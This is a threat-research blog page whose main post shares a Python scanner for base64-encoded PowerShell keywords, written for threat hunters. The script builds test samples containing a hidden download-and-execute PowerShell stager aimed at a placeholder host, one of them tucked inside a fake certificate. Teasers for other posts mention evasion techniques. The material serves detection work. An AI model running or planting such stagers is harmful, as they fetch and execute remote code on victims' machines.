InQuest Blog

Threat-hunting, malware, ransomware, vulnerability analysis and news from authors of InQuest.

Base64 Encoded Powershell Pivots

Posted on 2019-07-19 by Pedram Amini
In this short post, we share a YARA rule that threat hunters will find valuable for identifying potentially malicious PowerShell pivots; specifically, it looks for base64-encoded PowerShell directives. We also share some interesting real-world samples, including an SSL certificate, a Microsoft Windows shortcut (LNK) file, and a JPG image. Base64 is among the most popular encodings used by malware today: decoders are available everywhere, and a custom one is easy to write when none is at hand.
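As an added illustration (this is not the YARA rule from the post, nor InQuest code), the script below shows the alignment problem any such rule has to solve: a base64 encoding of a keyword depends on where the keyword falls in the 3-byte input groups, so there are three distinct encodings to look for, and `powershell -EncodedCommand` additionally expects UTF-16LE input. The keyword list, the sample command line, the fake certificate body and the benign command line are all constructed for this example.

```python
import base64
import re

# Assumed keyword list for this example; the post's own rule may use other directives.
DIRECTIVES = [
    "Invoke-Expression",
    "New-Object Net.WebClient",
    "DownloadString",
    "FromBase64String",
]


def base64_variants(plaintext: bytes) -> list:
    """Return the base64 substrings that match `plaintext` at each of the
    three possible alignments. Base64 turns 3-byte groups into 4 characters,
    so the encoding of a string depends on (its offset in the stream) mod 3.
    For each offset we prepend filler, encode, and cut off the characters
    whose value depends on the filler or on whatever follows the string."""
    variants = []
    for offset in range(3):
        encoded = base64.b64encode(b"\x00" * offset + plaintext)
        # Leading characters that mix in filler bits: none at offset 0,
        # two at offset 1, three at offset 2.
        lead = (0, 2, 3)[offset]
        # Trailing characters that mix in the next byte: one '=' means one
        # unstable character plus the '='; two '=' means one plus the two.
        pad = encoded.count(b"=")
        trail = (0, 2, 3)[pad]
        variants.append(encoded[lead:len(encoded) - trail])
    return variants


def build_signatures(directives=DIRECTIVES) -> dict:
    """Map (directive, encoding) to its three alignment variants. UTF-16LE is
    what `powershell -EncodedCommand` decodes; UTF-8 covers scripts that are
    base64-embedded inside other files."""
    return {
        (d, enc): base64_variants(d.encode(enc))
        for d in directives
        for enc in ("utf-8", "utf-16le")
    }


SIGNATURES = build_signatures()


def scan(blob: bytes, signatures=SIGNATURES) -> set:
    """Return the (directive, encoding) pairs whose base64 form appears in
    `blob`. Whitespace is stripped first so that line-wrapped base64 (PEM
    bodies, mail attachments) still matches as one stream."""
    flat = re.sub(rb"[ \t\r\n]+", b"", blob)
    return {key for key, variants in signatures.items()
            if any(v in flat for v in variants)}


# --- Constructed samples (not real-world artifacts) ----------------------

# 1. A typical encoded-command pivot: script is UTF-16LE, then base64.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_CMDLINE = (
    b"powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(_STAGER.encode("utf-16le"))
)

# 2. A fake PEM body carrying a UTF-8 script two bytes into the payload, so
# the keywords land at a non-zero alignment, wrapped at 64 columns like PEM.
_PAYLOAD = (b"\x30\x82"
            b"$x=(New-Object Net.WebClient).DownloadString('http://example.invalid/y');"
            b"Invoke-Expression $x"
            b"\x00\x01")
_BODY = base64.b64encode(_PAYLOAD)
SAMPLE_PEM = (b"-----BEGIN CERTIFICATE-----\n"
              + b"\n".join(_BODY[i:i + 64] for i in range(0, len(_BODY), 64))
              + b"\n-----END CERTIFICATE-----\n")

# 3. Clear-text command line with no base64 at all: must produce no hit.
SAMPLE_BENIGN = b"powershell.exe -Command \"Get-Process | Out-File C:\\temp\\p.txt\""


if __name__ == "__main__":
    for name, blob in (("cmdline", SAMPLE_CMDLINE), ("pem", SAMPLE_PEM),
                       ("benign", SAMPLE_BENIGN)):
        print(name, sorted(scan(blob)))
```

Two caveats when turning this into a production rule: PowerShell is case-insensitive, so `downloadstring` evades the patterns above unless case variants are enumerated as well, and YARA 4.0 and later can do the alignment expansion for you with the `base64` and `base64wide` string modifiers.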

YARA For Everyone: Sharing is Caring

Posted on 2019-06-30 by William MacArthur

Abusing Registration-Free COM Interop

Posted on 2019-05-29 by Amirreza Niakanlahiji
In this short post, we dissect the inner workings of registration-free COM interop and present a known technique that red teamers can abuse to dynamically load .NET assembly logic. This technique was first presented by Casey Smith. Additionally, some minor obfuscated variations are presented in hopes of evading existing detection mechanisms.

Analysis of an Interesting Malicious HTA File

Posted on 2019-04-30 by Amirreza Niakanlahiji
In this article, we dissect an HTA file that we found in the wild on VirusTotal on April 12. This malware instance uses a handful of techniques to evade detection, notably dynamically loading a serialized .NET library and DLL sideloading.

Making a Twitter Bot with ThreatIngestor

Posted on 2019-03-26 by Adam Musciano
What is ThreatIngestor? ThreatIngestor helps you collect threat intelligence from public feeds and gives you context on that intelligence so you can research it further and put it to use protecting yourself or your organization. The code is available in a GitHub repository.